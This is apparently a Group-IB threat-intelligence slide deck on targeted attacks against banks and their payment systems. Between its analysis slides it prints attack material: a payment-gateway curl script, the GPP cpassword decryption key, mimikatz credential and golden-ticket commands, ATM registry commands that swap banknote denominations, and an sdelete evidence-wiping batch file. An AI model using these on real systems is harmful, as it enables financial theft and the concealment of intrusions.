Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
Positive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
Positive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
Positive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
Positive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
Positive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Positive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
Positive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
Positive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
Positive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
Positive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
Positive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
Positive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 

Recently uploaded (20)

FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 

Хакеры хотят ваш банк больше, чем ваших клиентов

  • 1. GROUP-IB.COM 11 Hackers want your bank more than your customers: The evolution of targeted attacks on financial institutions
  • 2. GROUP-IB.COM 22 Who are the attackers?
  • 4. GROUP-IB.COM Who are they? What are their favorite targets? KNOWN TARGETED ATTACKERS Buhtrap ARM CBR (SWIFT analog) Сobalt ATM, Card processing, SWIFT Corkow Trading terminals, Card processing, ATM Anunak Internet banking, ARM CBR, SWIFT, Payment gateways, Card processing, ATM Lurk ARM CBR (SWIFT analog) 4
  • 5. GROUP-IB.COM 5 FUTURE TARGETED ATTACKERS • Toplel • Ranbyus • RTM • Vawtrak • Dridex Balance is 500 thousand pounds, inter-UK, for money mules (now such money mules now). Skip for now. Account for authorization of payments, balance is 2 million pounds No function of payment approval. Balance is 18 million pounds. Tried to transfer 2 million to China Balance is 15 million pounds, dual authorization off. No opportunity to establish sort code for transfer. It is better to ring out Future Attackers after your network
  • 7. GROUP-IB.COM Targets: Corporate internet banking software • Compromise operator workstations of corporate accounts • Listing companies with high balances • Generating new digital signatures for each company • Transactions from corporate accounts signed with new digital signatures 7 Access to corporate internet banking enables criminals to steal from TOP clients. Anunak used this method in 2013-2014.
  • 8. GROUP-IB.COM Targets: Payment gateways $ses = date("Ymdhis"); $url = "http://ru-demo.cyberplat.com/cgi- bin/DealerSertification/de_pay.cgi"; $data_string = "SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=".$ses."&COMM ENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT =10.0"; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded','Content-Length: '.strlen($data_string))); curl_setopt($ch, CURLOPT_POSTFIELDS, "inputmessage=0000038801SM000001270000012700000125&".$ data_string); $result = curl_exec($ch); var_dump($result); • Once inside, hackers search for payment gateways • Obtain log files from payment gateways to understand the typical format of communication • Start SOCKS proxies on internal hosts to enable communication with payment gateways • Run scripts to replenish attacker’s phone balances in thousands of transactions • Transfer money from phones to cards and cash out 8 Payment gateways enables high frequency, low amount transfers. Very hard to stop and return money.
  • 9. GROUP-IB.COM Targets: ATM • Hackers Identify ATM manufactures • They detect physical ATM locations • Upload from internal network to ATM • Jackpot with diagnostic tools • Jackpot with custom malicious programs for specific ATMs 9 ATM heists – the easiest way to launder money. Cobalt used malware to withdraw bags cash totalling $2.6m from 41 ATMS in Taiwan.
  • 10. GROUP-IB.COM Targets: Trade terminals • The attack lasted only 14 minutes • $437 million in purchases (5 trades ) • $97 million sold (2 trades) • 55 to 66 Rubles — volatility in exchange rate 10 Corkow conducted the first successful attack on broker terminals in 2015.
  • 12. GROUP-IB.COM Targets: ARM CBR or SWIFT SWIFT [ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmin [ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmout ARM CBR [ROOT_DRIVE]:uarm3exqinc [ROOT_DRIVE]:uarm3exqout • Identify working directory of SWIFT or ARM CBR application • Replace payment details with fraudster’s information • Intercept confirmation messages to bypass identification of fraudulent transactions 12
  • 13. GROUP-IB.COM Targets: Card processing • Legally open bank cards in the same bank or buy new cards on dark market (usually about 30 cards) • Remove or increase withdraw limits • Remove overdraft limits (even for debit cards) • Cash out using these cards in other countries 13 Cobalt, Corkow, Anunak have been conducting these attacks since 2014. It provides very important cash-out benefits.
  • 15. GROUP-IB.COM Malware Delivery: Driveby GROUPS WHICH HAVE USED THIS METHOD: • Anunak • Corkow • Buhtrap • Lurk 800 000+ total visitor per day 11% average exploit success rate 90 000 possible infections per day 15
  • 16. GROUP-IB.COM Malware Delivery: Custom pay-per-install GROUPS WHICH HAVE USED THIS METHOD: • Anunak #!/usr/bin/python # -*- coding: utf-8 -*- import os from bulkwhois.shadowserver import BulkWhoisShadowserver iplist_file = 'ip.txt' path = os.path.dirname(os.path.abspath(__file__)) bulk_whois = BulkWhoisShadowserver() iplist = [] with open(os.path.join(path, iplist_file)) as f: for line in f: iplist.append(line.strip()) result = bulk_whois.lookup_ips(iplist) with open(os.path.join(path, 'data.txt'), 'a') as f: for record in result: f.write('IP: %s CC: %s Org. Name: %s Register: %s AS Name: %s BGP Prefix: %s ------------------------------------------------------- ' % (result[record]['ip'], result[record]['cc'], result[record]['org_name'], result[record]['register'], result[record]['as_name'], result[record]['bgp_prefix'])) 16 WHAT THEY DID: • Contact botnet owner • Ask to provide IPs of infected machines • Check IP list with script • Check for records related to financial institutions • Ask botnet owner to install new trojan
  • 17. GROUP-IB.COM Malware Delivery: Web hack 17 GROUPS WHICH HAVE USED THIS METHOD: • Anunak and individual hackers in 2013, 2014, 2015 WHAT THEY DO: • Identify SQL injection • Do EXEC in SQL request to gather information about net environment • Upload files on server with echo command downloading from remote host with Meterpreter • Upload mimikatz on the Domain Controller • Create hidden tunnels
  • 18. GROUP-IB.COM Malware Delivery: Phishing Emails GROUPS WHICH HAVE USED THIS METHOD: • Anunak • Buhtrap • Lurk • Cobalt • MoneyTaker METHODS TO ENSURE DOCUMENTS ARE OPENED: • Mass mailing to corporate email addresses • Calls to bank managers • Hacking bank clients • Hacking bank partners ATTACHMENTS: • Executables • Executables in encrypted archive • Document with exploits • Document with malicious macros 18
  • 19. GROUP-IB.COM Malware Delivery: Spear phishing with faked sender address ADVANTAGES DISADVANTAGES • Easy to start • Unlimited list of brands • No need to register domains • Less traces for the investigation • High level of trust for users • Hard to detect if email delivered to end user • Don’t pass Sender Policy Framework (SPF) check • Low delivery percent 19
  • 20. GROUP-IB.COM ADVANTAGES DISADVANTAGES • Can bypass Sender Policy Framework (SPF) check • New TLD allows registering very similar domains • High percent of delivery • Vigilant users can detect it • Additional traces for investigation Malware Delivery: Spear phishing with faked sender address 20
  • 21. GROUP-IB.COM Malware Delivery: Spear phishing from compromised partner ADVANTAGES DISADVANTAGES • Almost 100% delivery with correct attachment • High percent of opening by users from contact list • No need to rent server and register domains • Limited by region where partner is located 21
  • 22. GROUP-IB.COM Tools to create malicious documents Microsoft Word Intruder (MWI) OffensiveWare Multi Exploit Builder (OMEB) 22
  • 24. GROUP-IB.COM 2424 What they do inside your network
  • 25. GROUP-IB.COM Legal Software vs. Private Tools New trend: Hackers Use Legal Software for Their Attacks PRIVATE TOOLS LEGAL SOFTWARE + – Legal attack framework has become very effective. Special trojans are not necessary anymore. • Unknown before first public research • Adjusted to the needs of the group • Easy to use • Inexperienced attackers can be involved • Investments in development are needed • High cost of ownership • Becomes known quickly • Dependency on developers • Attracts attention • Easier to attribute incidents and threat actors • Simplifies the process of investigation • Hard to track such attacks • Difficult to link different incidents • Less traces to investigate • Difficult to detect in a local network • Higher qualification • Many solutions are DIY • Difficult to attack several targets simultaneously 25
  • 26. GROUP-IB.COM KSC as a tool for provisioning the malware 26
  • 27. GROUP-IB.COM KSC as a tool for provision of the RMS and scanning server 27
  • 28. GROUP-IB.COM Gaining privileges DOMAIN CONTROLLER CONFIGURATION ERROR • Using Group Policy Preferences (GPP) • [server_name]sysvol[domain_name]Policies[group_policy_nam e]MachinePreferencesGroupsGroups.xml • The perpetrators extract domain administrator credentials from the cpassword and userName fields in the Groups.xml file (the password is encrypted using the AES-256 algorithm and further coded using Base64 encoding). • To obtain an unencrypted password the attackers decode it using Base64. • This password is then decrypted using the key 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b 66c1b. 28
  • 29. GROUP-IB.COM Gaining privileges MIMIKATZ If the attackers have access to a domain controller mimikatz sekurlsa::logonpasswords If the attackers have local root privileges without access to a domain controller The attackers connect to workstations and servers in order to find a user with access to the domain controller. The attack pass-the-hash can be performed. 29
  • 30. GROUP-IB.COM Gaining privileges MIMIKATZ If the attackers do not have local administrator rights Exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 and CVE-2015-2426 enables the criminal to gain SYSTEM level privileges in x32 and x64 operating systems. The malware connects to hosts andcheck them for necessary vulnerabilities. MIMIKATZ GOLDEN TICKET • "privilege::debug" "lsadump::samrpc /patch" exit • extracting NTLM hash of the krbtgt account (Key Distribution Center Service Account) • creating a file with a gold TGT ticket 30
  • 31. GROUP-IB.COM Tools to research the network netscan.exe – a network scanner NetScan patch86.exe – a Termsrv patch to support simultaneous terminal sessions (KEY indicator) plink.exe – an ssh console client for Windows psexec.exe – a remote console for Windows 31
  • 32. GROUP-IB.COM Tools to research the network REMOTE ADMINISTRATION TOOLS: • AmmyAdmin • TeamViewer or TVRat • Hamachi LogMeIn • RMS • LightManager • HidenVNC • Hidden channel over SMB, DNS, HTTPS 32
  • 33. GROUP-IB.COM Provision of the trojan survivability 33
  • 34. GROUP-IB.COM 34 Tools to used to complete attacks
  • 35. GROUP-IB.COM Change denomination of withdrawal banknotes .bat file from ATM Registry key name Value VALUE_1 5000 VALUE_2 1000 VALUE_3 500 VALUE_4 100 • Remote access to ATM from internal network • Launch .bat script that changed registry keys • Money mule came to the ATM and withdraw cash from its bank account • During withdraw he set small denominations • Instead of small denominations the ATM spit out big denominations from wrong cassette REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f shutdown -r -t 0 -f 35
  • 36. GROUP-IB.COM Modified diagnostic tools • Attackers disabled the KDIAG function responsible for checking if the door is open. • Uploaded a modified version of KDIAG to the ATM and sent the command to withdraw cash • At the same time, a money mule came to the ATM with an open bag to grab money 36
  • 37. GROUP-IB.COM Software for attacks on ATMs ServiceLogicalName — a service name used as an argument for the WFSOpen function (for example, “Cash Dispenser Module”). Cassettes Count — the total number of cassettes on the device. The value should be set in the interval from 1 to 15. Cassette Number — the number of the cassette, which should dispense cash. The value should be set in the interval from 1 to 15. Banknotes Count — the amount of banknotes to be dispensed from the cassette. The value should be set in the interval from 1 to 60. Dispenses Count — the number of times cash dispenses should be repeated. The value should be set in the interval from 1 to 60. A malicious program that uses standard functions for the XFS interface via the XFS Manager (eXtensions for Financial Services). 37
  • 38. GROUP-IB.COM Outward Telegraphic Transfer Comm & Charges MD5 6D355FFA06AE39FC8671CC8AC38F984E Searches files in catalog: D:WIN32APPSWIFTALLIANCESERVERBatchOutgoingHKHKAcksBak In this instance, «Outgoing» signifies outgoing transactions, «HK» signifies Hong Kong, accordingly the program searches for transactions to Hong Kong banks. If file is bigger than 102400 bytes it then attaches into file C:TempMsglog.txt «Too big file <file name> : <file size> > 102400rn», it opens and will search substrings: «OTTC605384», «OTTC605385», «OTTC601386», «OTTC601387», «OTTC605381», «OTTC605382» If a file contains this substring, then it writes into log C:TempMsglog.txt the following string «Found file: %s with required token: <founded substring>rn» and copies this file into directory «C:TempMsg» Then it goes into standby mode each 2.5 seconds, and then repeats the search of the substring. Hong Kong-based FI OTTC605384 OTTC605385 OTTC601386 OTTC601387 OTTC605381 OTTC605382 38
  • 39. GROUP-IB.COM ARM CBR (SWIFT analoge) MONEYTAKER V5.0 Four modules: Main – launch other modules with parameters specified in main config file AutoReplacer (XmlBin) – replaces in ARM CBR directory payment details. Results of replacement writes to Xml-Resultfile. Do not change SUM field to avoid detection. Hiding (EdBin) – checks for incoming/confirmation messages. It checks for field «PayeePersonalAcc» and compare it with «HackAcc» in from Xml-Resultfile. If the values match, then hiding module restore original PayeePersonalAcc field. Temp (TxtBin) – unknown. Xml-Resultfile # # Id= OrigAcc= OrigBic= OrigCor= Purpose= HackAcc= HackBic= HackCor= Sum= PayerPersonalAcc= # # 39
  • 40. GROUP-IB.COM Software to clean evidences DEL.BAT sdelete.exe -accepteula -p 32 d2.exe sdelete.exe -accepteula -p 32 xtl.exe sdelete.exe -accepteula -p 32 *.txt sdelete.exe -accepteula -p 32 d2s.exe del sdelete.exe del del.bat The del.bat script launches the SDelete program, which is designed to delete files in a special manner making it impossible to recover them with a forensic investigation. MBR KILLER Program deletes Master boot record (MBR) 40
  • 41. GROUP-IB.COM Future More criminal groups Targeted attacks is a new call for attackers who know about banks and money laundering More attacks Global landscape, ready to use tools, technics and tactics allows to be more effective. Legal software We will see much more attacks with use if legal software without private trojans. Harder to attribute and investigate Legal software in attacks will force us to change attribution and investigation procedures. 41